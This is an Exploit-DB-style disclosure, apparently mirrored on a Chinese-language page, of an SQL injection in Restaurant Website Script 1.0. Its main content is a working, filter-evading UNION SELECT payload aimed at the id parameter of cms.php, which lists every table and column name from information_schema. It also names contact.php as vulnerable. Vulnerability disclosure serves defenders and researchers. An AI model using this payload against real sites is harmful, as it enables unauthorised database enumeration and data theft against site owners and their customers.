Restaurant Website Script 1.0 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-09-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42642/
  • # # # # # 
    # Exploit Title: Restaurant Website Script 1.0 - SQL Injection
    # Dork: N/A
    # Date: 09.09.2017
    # Vendor Homepage: http://scriptzee.com/
    # Software Link: http://scriptzee.com/small-business/restaurant-website-script
    # Demo: http://restaurant.scriptzee.com/
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    # 
    # Proof of Concept:
    # 
    # http://localhost/[PATH]/cms.php?id=[SQL]
    # 
    # -6'++/*!00002UNION*/+/*!00002SELECT*/+0x31,0x32,0x33,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,19,20,0x3231,0x3232--+-
    # 
    # http://localhost/[PATH]/contact.php?id=[SQL]
    # 
    # Etc..
    # # # # #